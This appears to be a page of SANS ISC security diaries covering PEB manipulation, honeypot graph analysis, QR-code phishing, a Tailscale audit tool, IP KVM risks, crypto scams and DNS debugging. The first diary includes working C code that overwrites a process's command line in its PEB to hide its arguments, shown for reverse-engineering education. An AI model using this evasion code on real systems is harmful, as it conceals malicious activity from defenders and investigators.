Diaries

Published: 2026-01-09

Malicious Process Environment Block Manipulation

Reverse engineers must have a good understanding of the environment where malware are executed (read: the operating system). In a previous diary, I talked about malicious code that could be executed when loading a DLL[1]. Today, I’ll show you how a malware can hide suspicious information related to created processes.

The API call CreateProcess() is dedicated to, guess what, the creation of new processes![2] I won’t discuss all the parameters here but you have to know to it’s possible to specify some flags that will describe how the process will be created. One of them is CREATE_SUSPENDED (0x00000004). It will instruct the OS to create the process but not launch it automatically. This flag is usually a good sign of maliciousness (example in case of process hollowing)

Every process has a specific structure called the “PEB” (“Process Environment Block”)[3]. It’s a user-mode data structure in Windows that the operating system maintains for each running process to store essential runtime information such as loaded modules, process parameters, heap pointers, environment variables, and debugging flags.

The key element in the previous paragraph is user-mode. It means that a process is able to access its own PEB (example: to detect the presence of a debugger attached to the process) but also to modify it!

Let’s take a practical example where a malware needs to spawn a cmd.exe with some parameters. We can spoof the command line by modifying the PEB in a few steps:

  1. Locate the PEB
  2. Read the process parameters
  3. Overwrite them
  4. Resume the process

Here is a proof-of-concept:

#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "ntdll.lib")

int main() {
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi;
 
    // Start a process with some parameters
    BOOL success = CreateProcessA(
        "C:\\Windows\\System32\\cmd.exe",
        (LPSTR)"cmd.exe /c echo I am malicious! }:->",
        NULL, NULL, FALSE,
        CREATE_SUSPENDED,
        NULL, NULL, &si, &pi
    );

    if (success) {
        PROCESS_BASIC_INFORMATION pbi;
        ULONG returnLength;

        // Get the PEB address
        NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &returnLength);

        // Read ProcessParameters
        PEB peb;
        ReadProcessMemory(pi.hProcess, pbi.PebBaseAddress, &peb, sizeof(PEB), NULL);

        RTL_USER_PROCESS_PARAMETERS params;
        ReadProcessMemory(pi.hProcess, peb.ProcessParameters, &params, sizeof(RTL_USER_PROCESS_PARAMETERS), NULL);

        // Overwrite the CommandLine buffer
        WCHAR newCmd[] = L"cmd.exe /c echo Nothing to see here!";
        WriteProcessMemory(pi.hProcess, params.CommandLine.Buffer, newCmd, sizeof(newCmd), NULL);
        printf("Press enter to continue and resume the process...\n");
        getchar();

        // Resume the process
        ResumeThread(pi.hThread);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
        printf("Process resumed with modified PEB.\n");
    }
    return 0;
}

Once you launch poc.exe, check the cmd.exe process:

With this scenario, cmd.exe is executed with the new parameters. What about modifying a running process and hide (not spoof) its parameters?

To achieve this, the process does not have to be created in suspended state but it must be kept running! The idea is to get a handle on the process and modify its PEB:

void modifyRunningProcess(DWORD pid, const wchar_t* newCmd) {
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProcess) return;

    PROCESS_BASIC_INFORMATION pbi;
    ULONG retLen;
    NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &retLen);

    PEB peb;
    ReadProcessMemory(hProcess, pbi.PebBaseAddress, &peb, sizeof(PEB), NULL);

    RTL_USER_PROCESS_PARAMETERS params;
    ReadProcessMemory(hProcess, peb.ProcessParameters, &params, sizeof(params), NULL);

    USHORT newSize = (USHORT)(wcslen(newCmd) * sizeof(WCHAR));
    WriteProcessMemory(hProcess, params.CommandLine.Buffer, newCmd, newSize + 2, NULL);
    WriteProcessMemory(hProcess, (PBYTE)peb.ProcessParameters + offsetof(RTL_USER_PROCESS_PARAMETERS, CommandLine.Length), 
​​​​​​​                       &newSize, sizeof(USHORT), NULL);

    CloseHandle(hProcess);
    printf("PEB Updated for PID: %d\n", pid);
}

By aware that this technique has an important limitation, you must replace the existing command line with a less (with trailing spaces) or equal length, otherwise there is a risk of buffer overflow! Finally, this technique will not prevent tools like EDRs to log the orignial parameters because they are logged at process creation. Hopefully!

[1] https://isc.sans.edu/diary/Abusing+DLLs+EntryPoint+for+the+Fun/32562
[2] https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
[3] https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 Comments

Published: 2026-01-07

Analysis using Gephi with DShield Sensor Data

I'm always looking for new ways of manipulating the data captured by my DShield sensor [1]. This time I used Gephi [2] and Graphiz [3] a popular and powerful tool for visualizing and exploring relationships between nodes, to examine the relationship between the source IP, filename and which sensor got a copy of the file. I queried the past 30 days of data stored in my ELK [4] database in Kibana using ES|QL [5][6] to query and export the data and import the result into Gephi. 

This is the query I used to export the data I needed. Notice the field event.reference == "no match" which is a tag that filters all the know researchers [7] added by Logstash as a tag. 

Kibana ES|QL Query from Analytics → Discover

FROM cowrie* 
| WHERE event.reference == "no match"
| KEEP related.ip, file.name, host.name
| WHERE file.name IS NOT NULL
| LIMIT 10000

This second example exports the source IP, file hash and filename. This query exported 2685 records for a period of 30 days of data.

FROM cowrie* 
| WHERE event.reference == "no match"
| KEEP related.ip, related.hash, file.name
| WHERE file.name IS NOT NULL
| LIMIT 10000

This screenshot shows one of the 2 groups of malware activity that contains various files. This is the first grouping of the files with multiple hashes and IP addresses for the same filename. 

The second grouping of IPs, filename and hashes are all related to redtail malware. 

One of the nice things with Gephi is where you can put the cursor on a specific type of activity to show the overall relationship from that point view and push the unselected data into the background. Using this graph and selecting with the cursor on IP 130.12.180.51 that uploaded several times (large blue arrow) shows the redtail malware by IP 130.12.180.51 over the past 30 days and the with all the files matching hashes.

Indicators

45.132.180.51
130.12.180.51
193.32.162.157
213.209.143.51

783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59 
59c29436755b0778e968d49feeae20ed65f5fa5e35f9f7965b8ed93420db91e5
048e374baac36d8cf68dd32e48313ef8eb517d647548b1bf5f26d2d0e2e3cdc7
dbb7ebb960dc0d5a480f97ddde3a227a2d83fcaca7d37ae672e6a0a6785631e9
d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e
3625d068896953595e75df328676a08bc071977ac1ff95d44b745bbcb7018c6f

[1] https://isc.sans.edu/diary/Analysis+of+SSH+Honeypot+Data+with+PowerBI/28872
[2] https://gephi.org/
[3] https://www.graphviz.org/download/
[4] https://github.com/bruneaug
[5] https://www.elastic.co/guide/en/elasticsearch/reference/8.19/esql-using.html
[6] https://isc.sans.edu/diary/Using+ESQL+in+Kibana+to+Queries+DShield+Honeypot+Logs/31704
[7] https://isc.sans.edu/api/threatcategory/research?json
[8] https://gephi.org/quickstart/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

0 Comments

Published: 2026-01-07

A phishing campaign with QR codes rendered using an HTML table

Malicious use of QR codes has long been ubiquitous, both in the real world as well as in electronic communication. This is hardly surprising given that a scan of a QR code can lead one to a phishing page as easily as clicking a link in an e-mail.

No more surprising is that vendors of security technologies have, over time, developed mechanisms for detecting and analyzing images containing QR codes that are included in e-mail messages[1,2]. These security mechanisms make QR code-based phishing less viable. However, due to the “cat and mouse” nature of cybersecurity, threat actors continually search for ways of bypassing various security controls, and one technique that can be effective in bypassing QR code detection and analysis in e-mail messages was demonstrated quite well in a recent string of phishing messages which made it into our inbox.

The technique in question is based on the use of imageless QR codes rendered with the help of an HTML table. While it is not new by any stretch[3], it is not too well-known, and I therefore consider it worthy of at least this short post.

Samples of the aforementioned phishing messages I have access to have been sent out between December 22nd and December 26th, and all of them had the same basic layout consisting of only a few lines of text along with the QR code.

Although it looks quite normal (except perhaps for being a little “squished”), the QR code itself was – as we have indicated above – displayed not using an image but rather with the help of an HTML table made up of cells with black and white background colors, as you can see from the following code.

<table role="presentation" border="0" cellpadding="0" cellspacing="0" width="180" height="180" align="center">
	<tr height="4">
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		...

Links encoded in all QR codes pointed to subdomains of the domain lidoustoo[.]click, and except for the very first sample from December 22nd, which pointed to onedrive[.]lidoustoo[.]click, all the URLs had the following structure:

hxxps[:]//<domain from recipient e-mail><decimal or hexadecimal string>[.]lidoustoo[.]click/<alphanumeric string>/$<recipient e-mail>

While the underlying technique of rendering QR codes using HTML tables is – as we’ve mentioned – not new, its appearance in a real-world phishing campaign is a useful reminder that many defensive controls still implicitly rely on assumptions about how malicious content is represented… And these assumptions might not always be correct.

It is also a good reminder that purely technical security controls can never stop all potentially malicious content – especially content that has a socio-technical dimension – and that even in 2026, we will have to continue improving not just the technical side of security, but also user awareness of current threat landscape.

[1] https://www.proofpoint.com/us/blog/email-and-cloud-threats/malicious-qr-code-detection-takes-giant-leap-forward
[2] https://www.cloudflare.com/learning/security/what-is-quishing/
[3] https://media.defcon.org/DEF%20CON%2032/DEF%20CON%2032%20villages/DEF%20CON%2032%20-%20Adversary%20Vilage%20-%20Melvin%20Langvik%20-%20Evading%20Modern%20Defenses%20When%20Phishing%20with%20Pixels.pdf

-----------
Jan Kopriva
LinkedIn
Nettles Consulting

0 Comments

Published: 2026-01-06

Tool Review: Tailsnitch

In yesterday's podcast, I mentioned "tailsnitch", a new tool to audit Tailscale configurations. Tailscale is an easy-to-use overlay to Wireguard. It is probably best compared to STUN servers in VoIP in that it allows devices behind NAT to connect directly to each other. Tailscale just helps negotiate the setup, and once the connection is established, data will flow directly between the connected devices. I personally use it to provide remote assistance to family members, and it has worked great for this purpose. Tailscale uses a "Freemium" model. For my use case, I do not need to pay, but if you have multiple users or a large number of devices, you may need to pay a monthly fee. There are also a few features that are only available to paid accounts.

Tailscale, like all VPN solutions, does, however, come with risks. You are exposing internal network assets, and misconfigurations can lead to unintentionally exposed hosts. I found Tailscale to be relatively straightforward to configure, but as things get more complex, it is easy to overlook some gaps in your configuration. Tailscale also offers some advanced security features that are not enabled by default. 

Tailsnitch is supposed to solve this problem. Tailsnitch is open source software and can be found on GitHub (https://github.com/Adversis/tailsnitch). It was created by security consulting company Adversis (https://www.adversis.io). To test it, I used the binary distribution for my ARM-based Mac. Tailsnitch can use OAUTH credentials to authenticate to Tailscale. To run it:

./tailsnitch --tailscale-path /Applications/Tailscale.app/Contents/MacOS/Tailscale

This is the default configuration. I only specified the "tailscale-path". Without it, tailsnitch wasn't able to identify my copy of the tailscale binary (it is not in my path). Other options include different output formats (JSON, verbose), filtering findings by severity, and an option to automatically fix any problems, which I did not test (I am not brave enough :) ).

 My first test run identified one "medium", two "low", and 13 "info" suggestions:

Medium

This was actually a nice find: Two of my systems ran out-of-date versions of Tailscale. Something I will have to fix after finishing writing this diary :)

Low

Two of my devices use keys without expiration. This isn't a great thing, but intentional in this case. These are family member systems that I need to access only rarely (a couple of times a year), and I do not want to have to maintain rotating keys. So this is a risk I am willing to accept. I appreciate the reasonable rating from tailsnitch.

Another "low" issue was that I had no ACL tests defined. This is a feature I wasn't aware of, and nice of tailsnitch to point this out to me. I need to look into what these tests can do for me (I am the only user of this Tailscale network, so different user restrictions are not an issue)

Info

The "Info" sections of the results pointed out some other features I wasn't aware of. But for a single-user Tailscale net, many of them are irrelevant (for example, setting up Groups for better access control). Some of the features, like more advanced logging, are only available for paid plans.

In my quick test, I found tailsnitch to be a great tool to not only identify problems with your tailscale configuration, but also to learn more about additional hardening options that are available. The tool is easy to run, and the results are presented with the necessary detail to learn more about the identified issues.

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

2 Comments

Published: 2026-01-05

Risks of OOB Access via IP KVM Devices

Recently, a new "breed" of IP-based KVM devices has been released. In the past, IP-based KVM devices required dedicated "server-grade" hardware using IPMI. They often cost several $100 per server, and are only available for specific systems that support the respective add-on cards. These cards are usually used to provide "Lights Out" access to servers, allowing a complete reboot and interaction with the pre-boot environment via simple web-based tools. In some cases, these IPMI tools can also be used via various enterprise/data center management tools.

The first "non-datacenter grade" device that provided similar capabilities to arbitrary systems was the "PIKVM"[1]. This device was based on a Raspberry Pi and combined various add-on cards (HDMI capture and USB device ports) to turn the Raspberry Pi into a remote access device. But even the PIKVM wasn't cheap. The hardware cost added up to around $100-$200. Fully assembled devices are available for around $300. While within reach for some hobbiists, it was still too expensive for many.

More recently, A chinese company, Sipeed, started offering a "NanoKVM" [2]. This device offers comparable capabilities for as low as $30 for a bare bones version ($60 for a more full-featured assembled version). The NanoKVM uses a very minimal RISC CPU and runs a stripped-down Linux variant providing just enough features to act as a servicable KVM. Consumer-oriented device manufacturers like GL-INET and others have released similar devices competing directly with the "NanoKVM", often offering some additional capabilities.

But turning these devices into a ubiquitous commodity has not come without problems. 

Some have accused Sipeed of installing deliberate backdoors in their devices and delaying addressing security vulnerabilities. Ultimately, you should never deploy a device from a vendor you do not trust. I am not able to answer for you, but you need to figure out if this is a risk you are willing to take. A device like an IP KVM will always have direct access to your system, and it will be able to intercept keystrokes and video output. Many of the alleged vulnerabilities, like insecure firmware updates, are sadly very common in consumer devices. The NanoKVM will download firmware updates from Sipeed's servers in China. It will report some system status with these requests, which again is not that unusual. Sipeed offers other products (for example, camera systems) built around the same RISC board, explaining things like microphones and such that are located on the board. For more details, see the reports released by Tom's Hardware in December [3].

Here are some tips to consider when installing one of these devices:

1. Do not expose the device to the Internet

Just like any administrative interface, do not expose the KVM to the internet. In particular, for KVMs, there is often a need to access them remotely. After all, you could reboot the system without KVM if you are at the same location as the system. Luckily, these KVMs often support Tailscale out of the box, or can support it with simple additional installs. Tailscale provides a simple VPN and NAT bypass solution to access systems even if your IP is dynamic. Any other VPN solution will work as well, but this usually requires you to operate some kind of "bastion host" at a cloud provider if you do not want to rely on the VPN offered by your firewall/router.

2. Set up strong authentication

PiKVM at least offers MFA via one-time passwords. I have not seen much else, but this is a reasonably good solution for this purpose. Just don't forget to enable it. NanoKVM considers MFA a "TODO Item". I don't think it has been implemented yet. 

3. Configure TLS

Even running over a VPN, you should still use TLS to connect to your KVM to avoid MitM issues. This requires a valid certificate, either issued by an internal or public CA. I was able to install "certbot" without too much trouble on a PiKVM. If you are unable to automatically renew certificates, use an internal CA, which can issue certificates with a longer lifetime. But avoid self-signed certificates that are not recognized as valid by your browser.

NanoKVM specifically points out in its manual that the system is not quite able to support the full bitrate over TLS, and you may see some dropped frames. This is annoying but usually not a deal breaker for simple remote access during emergencies. It may be an issue if you use the KVM for more routine work, for example, if you attempt to use a laptop located in the US from an office in North Korea to work your remote job.

4. Logging

I wrote in the past about securing out-of-band access. One thing I see often missing, even with devices like console servers, is a decent logging or alerting solution to track use of the OOB access. At least log to a central syslog server. In some cases, I implemented little scripts that alert me of each login via SMS and e-mail. 

5. Console Access Security

Once you are using a KVM to access your system, it is important to implement authentication on the system connected to the KVM. You should have the standard login and auto-logout/screen lock features enabled, just as you would on a system sitting in an office.

6. Test

OOB systems are usually used infrequently. It is important to verify that the system is working and configure alerts in case they are not. Sadly, it all too often happens that systems like this are "Dead" for a long time, something that is only noticed during the emergency when they are used. Some simple monitoring scripts should check that the system is operating correctly.

 

[1] https://pikvm.org
[2] https://sipeed.com
[3] https://www.tomshardware.com/tech-industry/cyber-security/researcher-finds-undocumented-microphone-and-major-security-flaws-in-sipeed-nanokvm

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 Comments

Published: 2026-01-04

Cryptocurrency Scam Emails and Web Pages As We Enter 2026

Introduction

In October 2025, a work colleague documented a cryptocurrency scam using a fake chatbot. After investigating this, I was able to receive messages from the campaign, and these emails have continued to land in my honeypot account since then. This diary documents the cryptocurrency scam campaign as it continues in 2026.


Shown above: My honeypot email inbox with several emails from this cryptocurrency scam campaign.

Details

This campaign promises cash payouts on cryptocurrency that potential victims unknowingly have.

This campaign primarily abuses the minimalist publishing platform telegra[.]ph, which anyone can use to publish a simple web page very quickly. Many of these emails have minimal messaging and contain links to these telegra[.]ph pages.


Shown above: Example of an email from this campaign with link to a telegra[.]ph page.



Shown above: Example of a telegra[.]ph page from this campaign.

This campaign is not limited to abusing telegra[.]ph. Many of these emails contain Google Forms pages that lead to the telegra[.]ph page.


Shown above: Example of a Google Forms email from this campaign.


Shown above: Example of a response from the Google Forms link that leads to a telegra[.]ph page for this campaign.

These telegra[.]ph pages generally lead to the same type of cryptocurrency scam, stating you have over $100K in US dollars worth of Bitcoin from an automated Bitcoin mining cloud platform.


Shown above: Example of a page to begin the cryptocurrency scam.

In November 2025, I posted a video on YouTube, where I went through the website step-by-step, interacting with the fake chatbot to get to the actual scam. The scam involves paying a fee to convert the supposed Bitcoin to US dollars, which potential victims would send to a wallet controlled by the criminals.

Final Words

Many free services are easy to abuse for these types of campaigns. While these emails may seem obviously fake, they continue to be cost-effective for criminals to send, and criminals can easily abuse other services to host everything needed for this scam.

Bradley Duncan
brad [at] malware-traffic-analysis.net

0 Comments

Published: 2026-01-02

Debugging DNS response times with tshark

One of my holiday projects was to redo and optimize part of my home network. One of my homelab servers failed in November. I had only thrown the replacement in the rack to get going, but some cleanup was needed. In addition, a lot of other "layer 1" issues had to be fixed by re-crimping some network drops and doing general network hygiene. The dust buny kind hygiene, not so much the critical controls type. After all, I don't want things to overheat, and it is nice to see all network links syncing properly.

But aside from the obvious issues, there was a more subtle and rather annoying one: Sometimes a website would take a long time to load. This was, in particular, the first time of the day I loaded the particular side, and it happened across a wide range of sites (pretty much any site). I ruled out ad filters and other security tools by temporarily disabling them. So I figured, it may be time to blame DNS... 

Luckily, tshark has some great tools to inspect and summarize DNS. To get started, I collected about an hour of DNS traffic on my firewall, and next, loaded it into tshark.

I started with the default "DNS statistics summary":

tshark -z dns,tree -nr dns.pcap

The output is rather verbose, so I am just highlighting some parts here

I got about the same number of queries and responses, so that part looked ok. It does not look like anything was completely off/wrong. Next, tshark summarized the DNS query types:

The first test I ran (not shown above) had a huge number of PTR record lookups. It turns out that this was my NTP server. Last year, I added one of my GPS-synced NTP servers to pool.ntp.org. It is now getting quite a bit of traffic. For whatever reason, it was configured to do reverse lookups on all connections. I do not know if I enabled this, or if this was the default (change control is for people who don't enjoy troubleshooting with tshark). The screenshot above is from after I had this feature turned off and shows a more normal distribution. tshark produces a similar breakdown for answers. The SOA, IXFR, and AXFR queries are due to some internal zones I use that are dynamically updated. My recursive nameserver hs DNSSEC validation enabled, which explains the DS, DNSKEY, and NSEC/NSEC3 queries.

From a performance point of view, the last few lines of the report are most interesting:

The average response time was 33 ms, which isn't too bad. But the maximum response time was almost 8 seconds. So let's try and dive into that in more detail:

tshark calculates the response time for each DNS response, and you can filter for it, or display it, using the "dns.time" field. I went for this approach:

tshark -nr dns.pcap -Y 'dns.flags.response==1' -T fields -e dns.time -e dns.qry.name -e ip.src | sort -n

This returns the response time, the query name, and the source IP, to identify what is causing these long response times. I sorted the output by response time. The last few lines of the output (every response exceeding 7 seconds):

7.221731000    firmware.zwave-js.io    1.1.1.1
7.222681000    isc.sans.edu    75.75.75.75
7.224087000    firmware.zwave-js.io    9.9.9.9
7.225434000    firmware.zwave-js.io    75.75.75.75
7.229738000    firmware.zwave-js.io    8.8.8.8
7.655821000    ywab.reader.qq.com    8.8.8.8

The "firmware" hostname is likely related to some IoT devices, and I doubt this affects my laptop's browsing experience. qq.com is not used by me but by other family members. So that leaves isc.sans.edu (which also had a 6-second response not shown here). 

Next, I checked if all the forwarding servers I am using behaved the same. I am using 1.1.1.1, 8.8.8.8, 9.9.9.9, and 75.75.75.75 (Comcast, my ISP).

All four behaved very similarly on average:

  Mean Median Std Variance
1.1.1.1 0.0350 0.0196 0.0381
8.8.8.8 0.0372 0.0200 0.0412
9.9.9.9 0.0366 0.0198 0.0365
75.75.75.75 0.0348 0.0200 0.0361

If anything, I was surprised how close the results were to each other. I am using Comcast as an ISP, and I believe DNS servers like 1.1.1.1/8.8.8.8/9.9.9.9 use likely the same anycast infrastructure used by Comcast's own servers (75.75.75.75).

Everything worth doing is also worth overdoing, so I created a quick plot of the data via gnuplot, and again, the four servers' response time is pretty much identical:

(This was close enough for me to double-check the filters.)

So what is the result? For now, the main outcome was to avoid the PTR queries from the NTP server (again, the data above was collected after). About half the queries were PTR queries, and PTR queries often fail and result in timeouts. But I am a bit in the denial phase as far as blaming DNS goes. I will let you know if I find something else.

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 Comments